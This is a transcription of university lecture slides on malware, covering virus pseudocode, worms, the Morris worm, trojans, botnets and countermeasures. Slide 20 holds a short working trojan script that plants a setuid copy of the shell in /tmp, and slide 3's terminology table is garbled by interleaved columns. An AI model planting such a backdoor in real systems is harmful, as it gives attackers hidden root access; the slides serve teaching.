Malware / Malicious Logic. fall 2015

Transcription

1 Malware / Malicious Logic fall 2015

2 What malware? Hints: Melissa, Code Red, SQL Slammer, MyDoom, Conficker, Stuxnet, CryptoLocker, CryptoWall Find current or older malware attacks What was the effect? What was the technique used/type of malware? What vulnerabilities were exploited? (How did it stop?)

3 [ Stallings & Brown Table 6.1] See Pfleger sec ! Auto-rooter Backdoor (trapdoor) Downloaders Drive-by-Download Exploits Flooders (DoS client) Keyloggers Logic bomb Macro Virus Mobile code Rootkit Virus Spammer programs Spyware Worm Trojan Zombie, horse bot Malicious hacker tools used to break into new machines remotely. Terminology Any mechanisms that bypasses a normal security check; it may allow unauthorized access to functionality in a program, or onto a compromised system. Code that installs other items on a machine that is under attack. It is normally included in the malware code first inserted on to a compromised system to then import a larger malware package. An attack using code in a compromised web site that exploits a browser vulnerability to attack a client system when the site is viewed. Code specific to a single vulnerability or set of vulnerabilities. Used to generate a large volume of data to attack networked computer systems, by carrying out some form of denial-of-service (DoS) attack. Captures keystrokes on a compromised system. Code inserted into malware by an intruder. A logic bomb lies dormant until a predefined condition is met; the code then triggers an unauthorized act. A type of virus that uses macro or scripting code, typically embedded in a document, and triggered when the document is viewed or edited, to run and replicate itself into other such documents. Software (e.g., script, macro, or other portable instruction) that can be shipped unchanged to a heterogeneous collection of platforms and execute with identical semantics. system entity that invokes the Trojan horse program. Set of hacker tools used after attacker has broken into a computer Malware that, when executed, tries to replicate itself into other system and gained root-level access. executable machine or script code; when it succeeds the code is said to Used be infected. to send large When volumes the infected of unwanted code is executed, . the virus also executes. Software A computer that program collects information that can run from independently a computer and and can transmits propagate it to a another complete system working by monitoring version of keystrokes, itself onto other screen hosts data on and/or a network, traffic; usually or by exploiting scanning files software on the vulnerabilities system for sensitive in the target information. system. A Program computer activated program on that an appears infected to machine have a useful that is function, activated but to launch also has a attacks hidden on and other potentially machines. malicious function that evades security mechanisms, sometimes by exploiting legitimate authorizations of a

4 Aspects/classes How does it spread? Stop and ask actively, through users, at execution What does it do? damage, theft of info, become a bot Self-contained or parasitic? worm/trojan/bot vs. virus

5 Viruses

6 Virus Modifies programs to include virus copy Spreads by USB sticks, PDF/Flash/Office Executes when host program is run Typically OS and hardware specific

7 [ Stallings & Brown Figure 6.1] Typical virus pseudocode program V := Explain slowly {goto main; ; subroutine infect-executable := {loop: file := get-random-executable-file; if (first-line-of-file = ) then goto loop else prepend V to file; } subroutine do-damage := {whatever damage is to be done} program V (virus) Original program subroutine trigger-pulled := {return true if some condition holds} main: main-program := {infect-executable; if trigger-pulled then do-damage; goto next;} next: } Size change can be detected!

8 Compression virus program CV := {goto main; ; subroutine infect-executable := {loop: file := get-random-executable-file; if (first-line-of-file = ) then goto loop; (1) compress file; (2) prepend CV to file; } main: main-program := {if ask-permission then infect-executable; (3) uncompress rest-of-file; (4) run uncompressed file;} } Original program Virus (CV) Compressed original (Can still be detected - how?)

9 Virus infections boot record on hard disk: executed when system is booted executable file: runs when program is run macro virus: application script (e.g. Office), runs when document is opened Plus combinations

10 How does it hide? Goal: hide from detection e.g by signature (structure) polymorphic (mutates each time it infects) encrypted (partly) metamorphic (may change both behaviour and appearance) more advanced stealth techniques rootkits: modify system to prevent detection

11 Macro virus Documents may include code/macros (e.g. Excel, Word, PDF ) interpreted when document is opened/viewed Examples: Visual Basic, Javascript Often spreads by Separate code from data!

12 Mobile phones 2013 Bill Shocker: virus attacking Android phones Impact: 620,000 users in China Sends spam & text msgs to profit advertisers % of Chinese ios users jailbroken App store, Google Play difficult to access (censorship) New market for anti-virus!

13 Worms

14 Worms Actively seeks new machines to infect Spreads by network, USB sticks,

15 Worm replication , instant messaging (as attachment) file sharing, e.g. by auto-run feature when inserting media (USB stick, CD, DVD) network protocol flaws (remote procedure calls, login, file transfer etc)

16 Classic: the Morris worm The first Internet worm, Nov 2, 1988 Intention: peaceful visit to all hosts on Internet Problem: bug in worm, hosts multiply infected Result: major DoS attack (10% of net, only Sun 3 and VAX machines)

17 Morris exploits Remote login: try host-based authentication (no password needed), password cracking Buffer overflow in finger protocol server: room for 512 bytes, send 536 (with VAX machine code) Trapdoor for debugging common mail server + send code/commands to receive worm; execute and repeat

18 More recent malware 1998: Melissa ( attack) 2001: Code Red (MS web server) 2004: Mydoom (mass-mailing) 2008: Conficker (Window, buffer overflow) 2010: Stuxnet (Iranian nuclear industry) 2013: CryptoLocker (ransomware, encrypts files) 2014: CryptoWall (likewise) 2003: SQL Slammer (buffer overflow in SQL server)

19 Trojans

20 Trojan example #!/bin/sh cp /bin/sh /tmp/.xxsh chmod u+s,a+x /tmp/.xxsh rm./ls ls $* What is the effect?

21 Trojans Where is a really good place for a trojan? Example: SSH server process (daemon) backdoor: let hardcoded password and ssh key in log all usernames/passwords, send to attacker (e.g. in Iceland) Similar attack at UU years ago

22 Trojan/backdoor Modify the login program to allow hardwired password (backdoor) problem: source code inspection Modify the C compiler: if the login program is compiled, inject the backdoor ( trojan ) same problem Modify C preprocessor: if C preprocessor being compiled, inject trojan code compile, install, replace source with original by Ken Thompson, developer of Unix and C! see Interesting links to articles in SP

23 Drive-by downloads Click, download virus, lose Not necessarily this obvious/visible

24 Social engineering

25 Effects/payload Damages: corrupt file system, empty files, rewrite BIOS, destroy boot sector Ransomware: encrypt user data, ask for payment to get decryption key Real-world: industrial espionage/sabotage (Stuxnet, Duqu, Flame) and of course NSA Effects may trigger at date or other condition

26 Botnets (Ro)bot: remote-controlled code installed by virus/worm/etc Botnet: thousands of bots for coordinated attacks DDoS, spamming, keylogging BIG BUSINESS! Rent your own botnet to take down competitors!

27 Countermeasures

28 Countermeasures Prevention (ideally): for example, keep system up-to-date do not use Admin/root accounts except when necessary ( least privilege principle) do not jailbreak your phone/device validate input; use Design Principles Detection, identification, removal anti-virus/malware software: big business Sandboxing: later in the course

29 Anti-virus generations 1. Simple scanners: detect known malware by signature (structure, size changes etc) 2. Heuristic scanners: clever tricks, common code fragments, integrity checksums/mdcs 3. Detect by actions/behaviour of malware (instead of code/structure) 4. Generic decryption: run code in emulator, let virus decrypt itself and then detect it

30 Summary Types: virus, worm, trojan Virus infection types Worm replication techniques Effects: damage, blackmail, bots, theft Countermeasures Also read about rootkits